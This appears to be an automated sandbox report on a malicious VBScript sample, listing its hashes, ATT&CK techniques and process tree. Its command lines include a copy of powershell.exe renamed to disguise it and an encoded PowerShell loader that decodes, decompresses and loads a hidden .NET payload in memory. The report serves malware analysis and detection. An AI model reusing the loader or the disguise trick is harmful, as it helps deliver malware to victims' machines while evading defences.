2de688735caaaff53236896a834ff7ae39b0e22da08bf459d0954b54d61ca692

General

Target

870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
Size

2.4MB
MD5

bd7a77c470549aad52435b8b7b785c36
SHA1

b18ff781161ff4c4bb3e91825053bed3d280ed20
SHA256

870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371
SHA512

7217805ec612b984672c4cd498b0cc3d8e9cc463fab70bef0fdd96276f1fe93425e03777999c266a876161444699bb09738d2b19154b378316af6118cc48445a
SSDEEP

49152:xBy7kDIlpNx0KQTuJlDl7QVqXhmfOUJ3bapil:a1o

Score

10^/10

discovery

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	1736	cmd.exe	30

Executes dropped EXE 1 IoCs

pid	Process
2740	870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2740	870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2740	870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2740	3052	WScript.exe	33
PID 3052 wrote to memory of 2740	3052	WScript.exe	33
PID 3052 wrote to memory of 2740	3052	WScript.exe	33
PID 3052 wrote to memory of 2740	3052	WScript.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
  "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" -enc JABDAGoAbgB4AHYAeABrAGUAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABPAHQAcgBnAGYAagBkACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQwBqAG4AeAB2AHgAawBlAG0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAVQBzAGwAeQByAGkAbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABPAHQAcgBnAGYAagBkAC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABJAGQAegByAGsAZQB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABVAHMAbAB5AHIAaQBvACAAKQA7ACQAUAB6AHIAagBnAG0AegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUwBiAHkAaABnAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASQBkAHoAcgBrAGUAeQAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUwBiAHkAaABnAHMALgBDAG8AcAB5AFQAbwAoACAAJABQAHoAcgBqAGcAbQB6ACAAKQA7ACQAUwBiAHkAaABnAHMALgBDAGwAbwBzAGUAKAApADsAJABJAGQAegByAGsAZQB5AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAVQBzAGwAeQByAGkAbwAgAD0AIAAkAFAAegByAGoAZwBtAHoALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFUAcwBsAHkAcgBpAG8AKQA7ACAAJABMAHgAZQBzAG4AaQB2AGMAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAFUAcwBsAHkAcgBpAG8AKQA7ACAAJABDAGMAdABqAG4AawBjAHoAIAA9ACAAJABMAHgAZQBzAG4AaQB2AGMAaAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEMAYwB0AGoAbgBrAGMAegAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAQwBjAHQAagBuAGsAYwB6AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:1816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/2740-4-0x0000000002C10000-0x0000000002C50000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing